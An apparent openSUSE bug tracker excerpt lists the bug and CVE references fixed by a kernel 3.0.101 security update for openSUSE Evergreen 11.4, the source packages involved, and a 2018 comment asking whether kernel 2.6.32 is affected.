Bug References: 1004418,758540,816446,861093,917648,928130,935757,939826,942367,944296,945825,946117,946309,948562,949744,949936,951440,952384,953527,954404,955354,955654,956708,956709,958463,958886,958951,959190,959399,961500,961509,961512,963765,963767,964201,966437,966460,966662,966693,967972,967973,967974,967975,968010,968011,968012,968013,968670,969356,970504,970892,970909,970911,970948,970956,970958,970970,971124,971125,971126,971360,972510,973570,975945,977847,978822
CVE References: CVE-2013-7446,CVE-2015-0272,CVE-2015-1339,CVE-2015-3339,CVE-2015-5307,CVE-2015-6252,CVE-2015-6937,CVE-2015-7509,CVE-2015-7515,CVE-2015-7550,CVE-2015-7566,CVE-2015-7799,CVE-2015-7872,CVE-2015-7990,CVE-2015-8104,CVE-2015-8215,CVE-2015-8539,CVE-2015-8543,CVE-2015-8569,CVE-2015-8575,CVE-2015-8767,CVE-2015-8785,CVE-2015-8812,CVE-2015-8816,CVE-2016-0723,CVE-2016-2069,CVE-2016-2143,CVE-2016-2184,CVE-2016-2185,CVE-2016-2186,CVE-2016-2188,CVE-2016-2384,CVE-2016-2543,CVE-2016-2544,CVE-2016-2545,CVE-2016-2546,CVE-2016-2547,CVE-2016-2548,CVE-2016-2549,CVE-2016-2782,CVE-2016-2847,CVE-2016-3134,CVE-2016-3137,CVE-2016-3138,CVE-2016-3139,CVE-2016-3140,CVE-2016-3156,CVE-2016-4486,CVE-2016-5195
Sources used:
openSUSE Evergreen 11.4 (src):    kernel-debug-3.0.101-105.1, kernel-default-3.0.101-105.1, kernel-desktop-3.0.101-105.1, kernel-docs-3.0.101-105.2, kernel-ec2-3.0.101-105.1, kernel-pae-3.0.101-105.1, kernel-source-3.0.101-105.1, kernel-syms-3.0.101-105.1, kernel-trace-3.0.101-105.1, kernel-vanilla-3.0.101-105.1, kernel-vmi-3.0.101-105.1, kernel-xen-3.0.101-105.1, preload-1.2-6.83.1

Comment 37 Ales Novak 2018-10-25 16:27:31 UTC

Is 2.6.32 affected? There's a bsc#1110072 including request for it.